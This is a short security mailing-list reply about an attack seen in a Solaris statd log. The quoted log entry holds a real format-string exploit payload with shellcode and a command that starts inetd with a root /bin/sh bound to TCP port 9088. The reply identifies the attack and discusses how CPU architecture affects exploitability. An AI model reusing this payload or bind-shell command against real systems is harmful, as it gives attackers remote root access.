Re: Solaris statd exploit?

[Thomas Dullien <dullien () gmx de>]

> I got this entry today on 3 different solaris boxes...
> Is this some kind of statd exploit?
> The OS is Solaris 8 (and Solaris 2.6)...
> All of the entries have the same pattern and time (probably 1 or 2
> seconds difference). A script kiddie attack?
> ----
> Aug 30 11:15:14 earth statd[236]: [ID 462824 auth.error] statd: attempt
> to create "/var/statmon/sm/%08x %08x %08x %08x %08x %08x %08x %08x %08x
> %08x %08x %08x %08x %08x %0242x%n%055x%n%012x%n%0192x%nK^v ^( ^ ^.  #^1
> F'F* FF+, NV1@/bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i"
> > >
> /tmp/m; /usr/sbin/inetd /tmp/m;"

This seems to be an exploit for the statd format string issues ... btw, you running on
an Intel or SPARC Cpu ?
If you're running a SPARC, I'd say that most likely you are a lot safer from exploitation
of format string issues than on an x86, as alignment when overwriting addresses becomes
important...